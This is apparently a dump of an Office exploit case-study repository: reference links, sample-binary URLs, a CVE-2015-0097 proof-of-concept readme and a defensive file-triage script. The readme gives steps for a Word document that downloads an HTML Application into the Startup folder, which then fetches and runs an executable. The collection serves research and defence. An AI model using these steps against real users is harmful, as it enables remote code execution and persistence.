├── CVE-2012-0158&CVE-2012-1856
│   ├── CVE-2012-0158
│   │   ├── 09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz
│   │   └── README.md
│   ├── CVE-2012-1856
│   │   ├── 76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz
│   │   ├── CVE-2012-1856分析报告.pdf
│   │   └── README.md
│   ├── MSCOMCTL_2007.OCX
│   ├── README.md
│   └── mscomctl_2007.dbg
├── CVE-2013-3906
│   ├── 0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz
│   └── README.md
├── CVE-2014-1761
│   ├── README.md
│   └── e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz
├── CVE-2014-4114&CVE-2014-6352
│   ├── 70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz
│   ├── README.md
│   └── e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz
├── CVE-2015-0097
│   ├── Create-Recordset.hta
│   ├── POC-Generator.vbs
│   ├── README.md
│   ├── Readme + Instructions.rtf
│   └── poc.bin
├── CVE-2015-1641
│   ├── 8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz
│   └── README.md
├── CVE-2015-2545
│   ├── 3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz
│   └── README.md
├── CVE-2016-7193
│   ├── 00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz
│   └── README.md
├── CVE-2017-0199&CVE-2017-8570
│   └── README.md
├── CVE-2017-0261&CVE-2017-0262
│   ├── 6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz
│   ├── 91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz
│   ├── README.md
│   └── ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz
├── CVE-2017-11826
│   ├── README.md
│   └── aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz
├── CVE-2017-11882&CVE-2018-0802&CVE-2018-0798
│   ├── 25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz
│   ├── README.md
│   ├── cve-2018-0802 poc with aslr-bypass.rtf
│   └── cve-2018-0802 poc with comments.rtf
├── CVE-2017-8759
│   ├── 0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz
│   └── README.md
├── README.md
└── papers
    ├── Attacking Interoperability-An OLE Edition.pdf
    ├── Moniker Magic-Running Scripts Directly in Microsoft Office.pdf
    ├── OLE object are still dangerous today-Exploiting Microsoft Office.pdf
    └── Persisting with Microsoft Office-Abusing Extensibility Options.pdf

/CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/README.md:
--------------------------------------------------------------------------------
reference:

1. [The eternal classic: CVE-2012-0158 vulnerability analysis, exploitation, detection and summary (永远的经典:CVE-2012-0158漏洞分析、利用、检测和总结)](https://www.anquanke.com/post/id/91643)

2. [Recycling Known Vulnerabilities - Old Cyber Attack Goes Stealth](http://blog.morphisec.com/recycling-exploits-cyber-security)

There are many analyses of this vulnerability; reference 1 is the most detailed, and reference 2 analyses an in-the-wild sample that exploits it and uses some interesting techniques to evade AV.
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/CVE-2012-1856分析报告.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/CVE-2012-1856分析报告.pdf
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/README.md:
--------------------------------------------------------------------------------
I wrote an analysis myself: [CVE-2012-1856: UAF vulnerability analysis of the Office ActiveX control MSCOMCTL.OCX (CVE-2012-1856 Office ActiveX控件MSCOMCTL.OCX UAF漏洞分析)](https://bbs.kanxue.com/thread-223844.htm).
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/MSCOMCTL_2007.OCX:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/MSCOMCTL_2007.OCX
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/README.md:
--------------------------------------------------------------------------------
Since both CVE-2012-0158 and CVE-2012-1856 are bugs in MSCOMCTL.OCX, I put them together. Microsoft used to publish a symbol file for this control but no longer does, so the .dbg file and MSCOMCTL.OCX (version 6.1.97.82) are provided here to help you understand them.
--------------------------------------------------------------------------------
/CVE-2012-0158&CVE-2012-1856/mscomctl_2007.dbg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/mscomctl_2007.dbg
--------------------------------------------------------------------------------
/CVE-2013-3906/0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2013-3906/0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz
--------------------------------------------------------------------------------
/CVE-2013-3906/README.md:
--------------------------------------------------------------------------------
reference:

[CVE-2013-3906 vulnerability analysis (CVE-2013-3906漏洞分析)](https://bbs.kanxue.com/thread-225993.htm)

[A hands-on guide to building Office exploits, part 2 (手把手教你如何构造office漏洞EXP(第二期))](https://www.anquanke.com/post/id/84536)
--------------------------------------------------------------------------------
/CVE-2014-1761/README.md:
--------------------------------------------------------------------------------
reference:

[A Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers](https://www.mcafee.com/blogs/internet-security/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/)
--------------------------------------------------------------------------------
/CVE-2014-1761/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-1761/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz
--------------------------------------------------------------------------------
/CVE-2014-4114&CVE-2014-6352/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-4114&CVE-2014-6352/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz
--------------------------------------------------------------------------------
/CVE-2014-4114&CVE-2014-6352/README.md:
--------------------------------------------------------------------------------
Since CVE-2014-6352 is a patch bypass for CVE-2014-4114, I put them together.

reference:

[Bypassing Microsoft's Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause](https://www.mcafee.com/blogs/internet-security/bypassing-microsofts-patch-sandworm-zero-day-root-cause/)

[Bypassing Microsoft's Patch for the Sandworm Zero Day: Even 'Editing' Can Cause Harm](https://www.mcafee.com/blogs/internet-security/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm/)

[An Analysis of Windows Zero-day Vulnerability 'CVE-2014-4114' aka "Sandworm"](https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/)
--------------------------------------------------------------------------------
/CVE-2014-4114&CVE-2014-6352/e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-4114&CVE-2014-6352/e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz
--------------------------------------------------------------------------------
/CVE-2015-0097/Create-Recordset.hta:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CVE-2015-0097/POC-Generator.vbs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-0097/POC-Generator.vbs
--------------------------------------------------------------------------------
/CVE-2015-0097/README.md:
--------------------------------------------------------------------------------
reference: [Microsoft Word Local Machine Zone Remote Code Execution](https://packetstormsecurity.com/files/132761/Microsoft-Word-Local-Machine-Zone-Remote-Code-Execution.html)
--------------------------------------------------------------------------------
/CVE-2015-0097/Readme + Instructions.rtf (document text rendered from the RTF; author Eduardo, created 2014-02-12, last revised 2015-07-16 according to the RTF info block):
--------------------------------------------------------------------------------
Microsoft Office Word 2003, 2007 Remote Code Execution Vulnerability

Word is prone to a remote code execution issue because of a component that allows script execution in the context of the opened document, which will run in the context of the Local Machine security zone of Windows/Internet Explorer. This security zone has relaxed restrictions, allowing arbitrary code to be executed using e.g. ADO objects such as "ADODB.recordset", which is able to create arbitrary files in arbitrary locations on the disk, including, of course, the currently logged-on user's Startup folder. The file can be an HTML application, and it will be run the next time Windows boots and the same user that was affected by this vulnerability logs on to Windows.

To exploit this vulnerability an attacker must trick users into opening a Microsoft Works file (with the ".WPS" extension) or files that appear to be legitimate Word documents such as ".doc ", ".docx ", ".rtf ", all of them having spaces (alt + 255) at the end. The ".wps" file, when opened, presents Word as the only option, with the option to always open with it checked; the other ones also cause Windows to present Word as an option. The file will be processed as a web page, usually in the Local Machine security zone, and this is when arbitrary code can be executed to, for instance, save an executable file to the Startup folder.

This has been successfully tested on the latest Office 2007 SP3 on Windows XP, 7, 8 and 8.1, all up to this date.
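The advisory above rests on two observable properties of the bait file: a name that looks like a Word document but ends in space characters (alt + 255), and a body that is HTML/script rather than an OLE, OOXML or RTF container, which Word then renders in the Local Machine Zone. The triage script below is an added example for this page, not code from the repository or from Eduardo's PoC: it strips and reports trailing space characters after a document extension, compares the claimed extension against the file's magic bytes, and flags HTML bodies that reference scripting COM objects. The sample inputs are constructed for the example, and the assumption that alt + 255 types a non-breaking space (U+00A0) on Windows is mine, so both ASCII spaces and U+00A0 are treated as trailing space.

```python
"""Triage check for the CVE-2015-0097 naming trick: a document name ending in space
characters whose body is really HTML. Added example with constructed inputs."""
import re

# Magic bytes of the containers Word expects behind these extensions.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # Compound File Binary (.doc, .wps)
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML zip (.docx)
RTF_MAGIC = b"{\\rtf"                             # .rtf

# Body formats each extension may legitimately carry (Word also opens RTF saved as .doc).
EXPECTED = {
    ".doc": {"ole", "rtf"},
    ".wps": {"ole"},
    ".docx": {"ooxml-zip"},
    ".rtf": {"rtf"},
}

# Trailing ASCII whitespace, NBSP (U+00A0, assumed to be what alt+255 types on Windows)
# and other Unicode space characters that a file manager renders as blank.
_TRAILING_RE = re.compile(r"[\s\u00a0\u2000-\u200b\u3000]+$")

HTML_MARKERS = (b"<html", b"<!doctype html", b"<script", b"<hta:application")
SCRIPT_OBJECTS = (b"adodb.", b"wscript.shell", b"scripting.filesystemobject")


def split_trailing_spaces(name):
    """Return (name without trailing spaces, the trailing space characters)."""
    m = _TRAILING_RE.search(name)
    if m is None:
        return name, ""
    return name[:m.start()], m.group(0)


def apparent_extension(name):
    """Extension a user would believe the file has, lower-cased, ignoring trailing spaces."""
    clean, _ = split_trailing_spaces(name)
    dot = clean.rfind(".")
    return clean[dot:].lower() if dot >= 0 else ""


def sniff_format(head):
    """Classify a file by its leading bytes."""
    if head.startswith(b"\xef\xbb\xbf"):   # UTF-8 BOM ahead of an HTML body
        head = head[3:]
    if head.startswith(OLE_MAGIC):
        return "ole"
    if head.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    if head.startswith(RTF_MAGIC):
        return "rtf"
    low = head[:1024].lower()
    if any(marker in low for marker in HTML_MARKERS):
        return "html"
    return "unknown"


def triage(name, head):
    """Return a list of findings for one file; an empty list means nothing suspicious."""
    findings = []
    _, trailing = split_trailing_spaces(name)
    ext = apparent_extension(name)
    fmt = sniff_format(head)
    if trailing and ext in EXPECTED:
        codepoints = ", ".join("U+%04X" % ord(c) for c in trailing)
        findings.append("trailing space characters after %r: %s" % (ext, codepoints))
    if ext in EXPECTED and fmt not in EXPECTED[ext]:
        allowed = "/".join(sorted(EXPECTED[ext]))
        findings.append("body is %s, not %s as %r implies" % (fmt, allowed, ext))
    if fmt == "html":
        low = head.lower()
        hits = [obj.decode() for obj in SCRIPT_OBJECTS if obj in low]
        if hits:
            findings.append("HTML body references scripting COM objects: " + ", ".join(hits))
    return findings


# Constructed samples (not real malware): an HTML file disguised as .doc with a trailing
# NBSP, and two benign files whose bytes match their extensions.
SAMPLES = {
    "invoice.doc\u00a0": (b"<html><head><script language=\"VBScript\">\n"
                          b"Set rs = CreateObject(\"ADODB.Recordset\")\n"
                          b"</script></head><body></body></html>"),
    "report.docx": ZIP_MAGIC + b"\x14\x00\x00\x00\x08\x00" + b"\x00" * 20,
    "notes.rtf": b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Calibri;}} plain text}",
}


def triage_samples(samples=SAMPLES):
    """Run triage over every sample; returns {name: findings}."""
    return {name: triage(name, head) for name, head in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_samples().items():
        print(repr(name), "->", findings or "clean")
```

Running the script prints three findings for the disguised file (the U+00A0 after ".doc", an HTML body where OLE/RTF was implied, and the ADODB reference) and "clean" for the two genuine documents. The same `triage` function can be fed real attachments by reading the first kilobyte of each file; the extension check is deliberately loose, since Word legitimately opens RTF named ".doc", and the point is the mismatch combined with the trailing spaces.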
88 | \par 89 | \par -Instructions to reproduce this vulnerability- 90 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 a)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 91 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 92 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Extract all the files to the same folder. The full path to the folder should not contain spaces or special characters. This has to do with the creation of the \'93}{\rtlch\fcs1 \af31507 93 | \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 94 | file creation, but nothing to do with the POC document that will be generated. This one can be saved in any of the currently logged on user\'b4s directories. 
(the user profile directory or any of its subdirectories, whatever their names) 95 | \par }\pard\plain \ltrpar\ql \li360\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin360\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 96 | \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 97 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 \hich\af31506\dbch\af0\loch\f31506 b)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 98 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 99 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 Run the script \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 POC-Generator.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 100 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 \'94. This will create a Word document with embedded HTML and script code that will allow execution of arbitrary code in the system. The user needs t}{\rtlch\fcs1 \af31507 \ltrch\fcs0 101 | \lang1033\langfe1033\langnp1033\insrsid13270317 o provide the document name, the IP address and port of the webserver from which the files will be retrieved, and the name of the executable file that will be downloaded and executed. 
At the end it will run the script \'93}{ 102 | \rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 create-recordset.hta}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 which will create the \'93}{\rtlch\fcs1 103 | \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94}{\rtlch\fcs1 \af31507 \ltrch\fcs0 104 | \lang1033\langfe1033\langnp1033\insrsid13270317 file which in turn contains code to retrieve a VBS file (}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 105 | \lang1033\langfe1033\langnp1033\insrsid13270317 ) to run Calc. 106 | \par }\pard \ltrpar\s18\ql \li720\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace {\rtlch\fcs1 \af31507 \ltrch\fcs0 107 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid5003448 108 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 c)\tab}}\pard \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 109 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Place the files \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 110 | \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 , 111 | \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 
\cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 and the custom EXE file 112 | (the file name must be the same one that you provided to the VBScript) in the root directory of a webserver. 113 | \par }\pard\plain \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 114 | {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 115 | \par {\listtext\pard\plain\ltrpar \s18 \rtlch\fcs1 \af0\afs22 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\langnp1033\insrsid13270317 \hich\af31506\dbch\af0\loch\f31506 d)\tab}}\pard\plain \ltrpar\s18\ql \fi-360\li720\ri0\sa200\sl276\slmult1 116 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\ls2\adjustright\rin0\lin720\itap0\pararsid13270317\contextualspace \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 {\rtlch\fcs1 \af31507 117 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Open the document. It should download the \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 recordset.txt}{\rtlch\fcs1 \af31507 118 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 \'94 file from the webserver and save it to the user\'b4s startup directory as an HTML Application. 
Upon rebooting, this HTML Application will retrieve the \'93}{\rtlch\fcs1 \af31507 \ltrch\fcs0 119 | \cf6\lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 dldrun.vbs}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 \'94 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 120 | file, which executes calc for demonstration purposes.}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \cf6\lang1033\langfe1033\langnp1033\insrsid13270317 }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid9401379 121 | \par }\pard\plain \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 122 | {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 123 | \par If there is any issue, please contact me. 
124 | \par }\pard \ltrpar\ql \li0\ri0\nowidctlpar\wrapdefault\faauto\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af5\afs24 \ltrch\fcs0 \f5\fs24\lang1033\langfe1033\langnp1033\insrsid13270317 Web server software used on this item: IIS on Windows Server 2003 125 | \par }\pard \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 126 | \par }\pard \ltrpar\ql \li360\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin360\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Author: }{\rtlch\fcs1 \af31507 127 | \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 Eduardo}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 Braun}{\rtlch\fcs1 \af31507 \ltrch\fcs0 128 | \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 Prado}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317 129 | \par 130 | \par EOF.}{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1033\langfe1033\langnp1033\insrsid13270317\charrsid6693792 131 | \par }\pard \ltrpar\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid13270317 {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid7935471\charrsid13270317 132 | \par }} 
--------------------------------------------------------------------------------
/CVE-2015-0097/poc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-0097/poc.bin
--------------------------------------------------------------------------------
/CVE-2015-1641/8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-1641/8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz
--------------------------------------------------------------------------------
/CVE-2015-1641/README.md:
--------------------------------------------------------------------------------
1 | reference: [CVE-2015-1641 Word exploit sample analysis](https://paper.seebug.org/351/)
2 |
--------------------------------------------------------------------------------
/CVE-2015-2545/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-2545/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz
--------------------------------------------------------------------------------
/CVE-2015-2545/README.md:
--------------------------------------------------------------------------------
1 | reference: [CVE-2015-2545 Word exploit sample analysis](https://paper.seebug.org/368/)
2 |
--------------------------------------------------------------------------------
/CVE-2016-7193/00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2016-7193/00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz
--------------------------------------------------------------------------------
/CVE-2016-7193/README.md:
--------------------------------------------------------------------------------
1 | reference: [An APT attack weapon: the Word vulnerability CVE-2016-7193 explained](https://paper.seebug.org/288/)
2 |
--------------------------------------------------------------------------------
/CVE-2017-0199&CVE-2017-8570/README.md:
--------------------------------------------------------------------------------
1 | CVE-2017-8570 is a patch bypass of CVE-2017-0199, and the two are easily confused, so I put them together. For example, this article is completely wrong: http://www.freebuf.com/news/143206.html
2 |
3 | reference:
4 |
5 | CVE-2017-0199
6 |
7 | [The mislabelled CVE-2017-8570 sample and the mess behind it](http://www.freebuf.com/news/143685.html)
8 |
9 | https://github.com/bhdresh/CVE-2017-0199
10 |
11 | [An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability](https://www.fortinet.com/blog/threat-research/an-inside-look-at-cve-2017-0199-hta-and-scriptlet-file-handler-vulnerability)
12 |
13 | CVE-2017-8570
14 |
15 | https://github.com/rxwx/CVE-2017-8570
16 |
17 | [CVE-2017-8570: the first publicly disclosed in-the-wild sample and vulnerability analysis](https://www.anquanke.com/post/id/96607)
18 |
19 | ["Bypassing" Microsoft's Patch for CVE-2017-0199](http://justhaifei1.blogspot.ca/2017/07/bypassing-microsofts-cve-2017-0199-patch.html)
20 |
--------------------------------------------------------------------------------
/CVE-2017-0261&CVE-2017-0262/6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-0261&CVE-2017-0262/91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-0261&CVE-2017-0262/README.md:
--------------------------------------------------------------------------------
1 | reference:
2 |
